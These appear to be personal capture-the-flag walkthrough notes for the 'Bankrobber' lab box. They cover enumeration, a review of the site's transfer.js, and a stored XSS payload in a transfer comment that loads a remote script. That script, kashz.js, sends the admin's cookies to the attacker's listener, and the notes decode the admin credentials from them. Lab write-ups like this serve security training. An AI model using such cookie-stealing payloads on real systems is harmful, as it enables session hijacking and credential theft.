2 :80 :443 XSS > admin
http://bankrobber.htb/
e-coin website
$ gobuster dir -u http://bankrobber.htb -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -x php,html,txt -t 80
===============================================================
/img (Status: 301) [Size: 338] [--> http://bankrobber.htb/img/]
/register.php (Status: 200) [Size: 0]
/login.php (Status: 302) [Size: 0] [--> index.php]
/index.php (Status: 200) [Size: 8245]
/user (Status: 301) [Size: 339] [--> http://bankrobber.htb/user/]
/admin (Status: 301) [Size: 340] [--> http://bankrobber.htb/admin/]
/link.php (Status: 200) [Size: 0]
/css (Status: 301) [Size: 338] [--> http://bankrobber.htb/css/]
/js (Status: 301) [Size: 337] [--> http://bankrobber.htb/js/]
/examples (Status: 503) [Size: 1060]
/generic.html (Status: 200) [Size: 13343]
/notes.txt (Status: 200) [Size: 133]
/logout.php (Status: 302) [Size: 0] [--> index.php?msg=Succesfully logged out]
/elements.html (Status: 200) [Size: 34812]
/licenses (Status: 403) [Size: 1205]
/fonts (Status: 301) [Size: 340] [--> http://bankrobber.htb/fonts/]
/phpmyadmin (Status: 403) [Size: 1205]
/webalizer (Status: 403) [Size: 1046]
http://bankrobber.htb/admin/
You're not authorized to view this page
http://bankrobber.htb/generic.html
Similar website (old); links not working.
http://bankrobber.htb/notes.txt
- Move all files from the default Xampp folder: TODO
- Encode comments for every IP address except localhost: Done
- Take a break..
# login page is on the index.php itself
# sends POST request
# default creds admin:admin; nothing happens
# register is also on index.php
# sends POST request
# response
http://bankrobber.htb/index.php?msg=User%20created.
# login as kashz:kashz
POST /login.php HTTP/1.1
Host: bankrobber.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 49
Origin: http://bankrobber.htb
DNT: 1
Connection: close
Referer: http://bankrobber.htb/index.php?msg=User%20created.
Upgrade-Insecure-Requests: 1
username=kashz&password=kashz&s=Submit+Query
# fetches /user/
GET /user/ HTTP/1.1
Host: bankrobber.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://bankrobber.htb/index.php?msg=User%20created.
DNT: 1
Connection: close
Cookie: id=8; username=a2FzaHo%3D; password=a2FzaHo%3D
Upgrade-Insecure-Requests: 1
# cookie is just base64: id in the clear, username and password base64-encoded (a2FzaHo= -> kashz)
# interesting js file is requested
GET /js/transfer.js HTTP/1.1
Host: bankrobber.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Referer: http://bankrobber.htb/user/
Cookie: id=8; username=a2FzaHo%3D; password=a2FzaHo%3D
# transfer.js
//Start user functions
// POST body is built by plain string concatenation: none of the four values is
// URL-encoded or otherwise sanitised on the client before reaching transfer.php.
function transferEcoin(fromId,toId,amount,comment){
    var http = new XMLHttpRequest();
    var url = 'transfer.php';
    var params = 'fromId='+fromId+'&toId='+toId+'&amount='+amount+'&comment='+comment;
    http.open('POST', url, true);
    http.setRequestHeader('Content-type', 'application/x-www-form-urlencoded');
    http.send(params);
}
function getVal(id){
    return document.getElementById(id).value;
}
// Reads the transfer form fields and submits them; the comment is free text.
function getData(){
    fromId = getVal("fromId");
    toId = getVal("toId");
    amount = getVal("amount");
    comment = getVal("comment");
    transferEcoin(fromId,toId,amount,comment);
    alert('Transfer on hold. An admin will review it within a minute.\nAfter that he will decide whether the transaction will be dropped or not.');
}
// End user function
// Start admin functions
// Admin-side approve/drop call to handle.php; its server code is not exposed.
function handleTransaction(status,id,from,to,amount){
    var http = new XMLHttpRequest();
    var url = 'handle.php';
    var params = 'status='+status+'&id='+id+'&from='+from+'&to='+to+'&amount='+amount;
    http.open('POST', url, true);
    http.setRequestHeader('Content-type', 'application/x-www-form-urlencoded');
    http.send(params);
}
// End admin functions
# can't find the handle.php code.
$ gobuster dir -u http://bankrobber.htb/user -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -x php,html,txt -t 80
===============================================================
/index.php (Status: 200) [Size: 39]
/auth.php (Status: 200) [Size: 39]
/transfer.php (Status: 200) [Size: 39]
# nothing here
# no vhosts
# exploring transfer e-coin
POST /user/transfer.php HTTP/1.1
Host: bankrobber.htb
Cookie: id=8; username=a2FzaHo%3D; password=a2FzaHo%3D
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 38
Origin: https://bankrobber.htb
Dnt: 1
Referer: https://bankrobber.htb/user/
Te: trailers
Connection: close
fromId=8&toId=2&amount=10&comment=test
# then comes a popup
Transfer on hold. An admin will review it within a minute.\nAfter that he will decide whether the transaction will be dropped or not.
# as admin will review our transaction, maybe we can request a callback
# tried links, nothing
Trying XSS
<script src="http://10.10.16.7/"></script>
$ python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.10.154 - - [30/Sep/2021 15:23:58] "GET / HTTP/1.1" 200 -
# we do get a callback
# tried payloads from PayloadsAllTheThings/XSS - was getting nothing.
# simple way - requested a .js file and had it executed when the admin reviewed the comment
# requesting .js file
<script src='http://10.10.16.7/kashz.js'> </script>
$ python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.10.154 - - [30/Sep/2021 15:30:38] code 404, message File not found
10.10.10.154 - - [30/Sep/2021 15:30:38] "GET /kashz.js HTTP/1.1" 404 -
# file: kashz.js (IP is a placeholder for the listening host)
function cookie1() {
    // Sends document.cookie to the listener as an image URL; this works only
    // because the session cookies are not marked HttpOnly.
    var img = document.createElement("img");
    img.src = "http://IP/?cookie=" + document.cookie;
    document.body.appendChild(img);
}
// invoked on load so the request fires when the script is executed
cookie1();
$ python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.10.154 - - [30/Sep/2021 15:35:58] "GET /kashz.js HTTP/1.1" 200 -
10.10.10.154 - - [30/Sep/2021 15:35:59] "GET /cookie?=username=YWRtaW4%3D;%20password=SG9wZWxlc3Nyb21hbnRpYw%3D%3D;%20id=1 HTTP/1.1" 404 -
# url-decode
GET /cookie?=username=YWRtaW4=; password=SG9wZWxlc3Nyb21hbnRpYw==; id=1 HTTP/1.1 404
# base64 -d
admin:Hopelessromantic